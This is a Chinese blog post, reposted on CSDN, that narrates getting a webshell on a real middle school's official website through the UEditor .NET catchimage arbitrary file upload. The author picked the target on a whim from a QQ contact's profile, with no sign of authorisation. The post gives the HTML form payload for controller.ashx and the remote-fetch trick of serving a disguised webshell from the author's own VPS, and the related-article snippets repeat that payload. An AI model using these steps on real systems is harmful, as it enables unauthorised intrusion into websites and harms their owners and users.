SRC | 记一次走运某校官网Getshell

最新推荐文章于 2024-09-16 07:09:40 发布
最新推荐文章于 2024-09-16 07:09:40 发布
阅读量211 收藏
点赞数
分类专栏: SRC挖掘 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63356045/article/details/133338473
版权

声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

 该文由内部群师傅提供~

|0x01 前言

    某天早上上班,有些没睡醒,随意翻阅着QQ好友列表。咦!这个人头像挺好看的,点开个人资料卡查看,发现上面写着XX中学,善于搜索的我好奇地找到了这个学校的官网。

基于习惯,我点开Wappalyzer浏览器插件,是一个Microsoft ASP.NET写的网站。

图片

|0x02 发现

打开F12,查看JS文件(其实是为了摸鱼,不被领导发现0.0)。

发现ueditor百度编辑器!!!

图片

打开编辑器配置文件ueditor.config.js

找到服务器统一请求接口路径为:net/controller.ashx。

图片

|0x03 验证

在我印象中ueditor1.4.3版本是存在任意文件上传漏洞的,尝试访问公开nday POC链接:

http://xxx/ueditor/net/controller.ashx?action=catchimage&encode=utf-8

漏洞存在!!!

图片

漏洞原因:

controller.ashx文件下只验证ContentType而没纠正文件后缀导致getshell。

有效负载如下,并保存为html格式

<form action="http://xxx/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"enctype="application/x-www-form-urlencoded"  method="POST">
    shell addr: <input type="text" name="source[]" />
                <input type="submit" value="Submit" />
</form>

在自己的VPS上启动一个简易的HTTP服务,并传马(可以不用图片马,直接改后缀称为jpg)。

图片

VPS使用python启动http服务。

python -m http.server

图片

打开自己VPS的url,查看页面。

图片

打开刚才创建的html,输入框输入http://vps的ip/asp.jpg?.ashx 

点击提交。

图片

上传成功,返回如下

图片

访问shell,文件存在

图片

|0x04 总结

    如果是.net的网站,看一下JS文件是否存在百度编辑器。

欢迎大家关注湘安无事公众号添加助手(wx:shougou1010)进技术交流群

一次linux服务器被攻击的处理经历
kapuchang的博客
02-24 8070
首先发现IO、流量异常。查找登录录,果不其然last命令没有结果,/var/log/wtmp文件被删除。查找/var/log/secure文件中的登录录:grep "Accept" /var/log/secure查dstat的日志文件,正是10:51分开始出现IO异常。用nethogs 、 iftop工具可以查看到本机与几个不知哪的ip端口建立了很多连接。初步处理是打开防火墙,仅打开需要用到的...
UEditor 任意文件上传漏洞
chennannanlucky的博客
07-08 2298
UEditor 任意文件上传漏洞
网安学习Day16-文件上传漏洞(下)
weixin_44770698的博客
05-11 760
解析漏洞 IIS6/7.X IIS6.0版本中,存在着目录解析漏洞和文件解析漏洞。 其中的网站的目录下的*.php的文件夹下的文件会被当做php来执行,也就是说我们在上传文件的时候可以上传一个1.php/2.jpg的文件,那么在IIS6.0的环境下,2.jpg会被当做php来执行。 IIS6.0还对应着文件解析漏洞,如果出现“;”号,则IIS6.0会出现错误,例如1.php;2.jpg,它会将分号后面的文件当做php来执行。 IIS7.0 7.5具有文件解析漏洞 在IIS7.x的环境中,当我们开
Ueditor GetShell 漏洞检测工具使用教程
最新发布
gitblog_00096的博客
09-16 1001
Ueditor GetShell 漏洞检测工具使用教程 项目地址:https://gitcode.com/gh_mirrors/ue/ueditor-getshell 1. 项目介绍 ueditor-getshell 是一个用于检测 Ueditor .NET 版本中存在的 getshell 漏洞的工具。该工具支持单个 URL 和批量 URL 的检测,帮助安全研究人员和开发人员快速发现和修复潜在的安...
ueditor getshell漏洞重现及分析
weixin_30681121的博客
12-07 1319
0x00 概述 8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。 0x01 漏洞重现 Payload: <formaction=”http://www.xxx.com/controller.ashx?action=catchimage”enctype=”application/x-w...
C# 使用Ueditor出现http://localhost:***/ueditor/net/controller.ashx?action=config&&noCache=***404问题解决
旭东怪的博客
09-28 6301
http://localhost:46819/ueditor/net/controller.ashx?action=config&&noCache=1601171905273404 (Not Found) 请求后台配置项http错误,上传功能将不能正常使用!
ue编辑器漏洞_UEditor编辑器任意文件上传漏洞分析
weixin_39533659的博客
12-21 408
漏洞主要在controller.ashx 文件下原因:其第14行接收一个action参数后端根据action值进行方法调用。且漏洞产生位置为catchimage(远程文件抓取)。你这写的uploadimages?当action等于catchimage后进入CrawlerHandler。19行接收一个参数。为source[]source的值不等于空的时候执行下面语句Crawlers = Source...
初中语文文摘文苑一个走运的人
09-09
这篇文章名为《初中语文文摘文苑一个走运的人》,主要讲述了作者与一位乐观积极的女店主之间的故事。女店主经营一家小小的杂货铺,尽管生活平凡,但她始终保持着感恩的心态,认为自己非常幸运。通过描述作者与女店主...
2021-2022年收藏的精品资料让孩子走运的秘诀读后感.doc
09-17
《让孩子走运的秘诀》是一本探讨如何培养孩子健康成长,激发其潜力,引导他们走向成功的教育书籍。书中的观点强调了父母在孩子成长过程中的角色,以及如何通过正确的教育方式来提升孩子的自信心和运气。以下是一些...
安卓应用-健康医疗-走运啦手机版 v1.3.7.zip
09-15
【标题】"安卓应用-健康医疗-走运啦手机版 v1.3.7.zip" 提供的是一个专门针对安卓平台的健康医疗应用——走运啦的手机版软件更新版本。这个应用可能聚焦于健康管理、健康咨询、运动跟踪或者疾病预防等方面,以帮助...
2021-2022年收藏的精品资料让孩子走运的秘诀.doc
09-17
【让孩子走运的秘诀】这份精品教育教学资料,揭示了如何培养孩子走向成功的秘密,由一位韩国主妇在育儿实践中总结得出。以下是对这些秘诀的详细解读: 1、**宽容与温暖的包容**:父母应以宽容的心态接纳孩子的错误...
Python-ueGetshellpyueditornetgetshell漏洞检测工具
08-10
ueGetshell.py - ueditor .net getshell漏洞检测工具
实战纪实 | 编辑器漏洞之Ueditor-任意文件上传漏洞 (老洞新谈)
热门推荐
zkaqlaoniao的博客
04-12 1万+
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
UEditor .Net版本任意文件上传漏洞复现
m0_37638874的博客
06-08 3515
  漏洞背景   漏洞影响   漏洞利用   漏洞分析漏洞背景漏洞影响漏洞利用首先准备一个html文件用来做post提交 action处填写网站的路径 另外:enctype="application/x-www-form-urlencoded"什么意思?打开html后如下 这个时候我们需要一台服务器用来放图片木马,服务器可以去阿里云、华为云等申请免费的我们准备一张的图片跟一个小马,小马代码如下 用命令合成图片木马 我们把此木马上传到我们的服务器,住服务器图片路径在之前的里填写如下参数 是我们服务器的地址后
ue编辑器漏洞_ueditor getshell漏洞重现及分析
weixin_39633165的博客
12-21 1024
0x00 概述8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。0x01 漏洞重现Payload:shelladdr:图片马x.jpg放在自己服务器上提交http://www.domain.top/x.jpg?.aspx返回:菜刀连接:0x02 修复方案增加文件扩展名校验(白名单)0x03 漏洞分析uedi...
【在MVC中应用百度富文本编辑器】
HilaryHe
04-19 3745
1.下载.NET版本的百度富文本编辑器,前往 下载.NET版本百度富文本框  2.解压下载的.zip压缩包,将utf8-.net文件夹名称改为:ueditor,复制到MVC根目录下面。结构如下: App_Code 上的文件是应用程序的源码 Config.cs 负责读取配置文件Handler.cs 是请求处理器的基类,提供了一些基本对象的访问以及输出控制。如果需要
实战 UEditor 任意文件上传漏洞
sweelg的博客
09-08 1796
该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响 影响版本 1.4.3.3 .NET。
A股实证:正交化与自助法揭示有效因子
本文由石川,一位拥有清华大学学士、硕士和麻省理工学院博士学位的北京量信投资管理有限公司创始人撰写,着重探讨了如何在金融领域的empirical asset pricing(实证资产定价)分析中,利用Harvey and Liu (2018)提出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值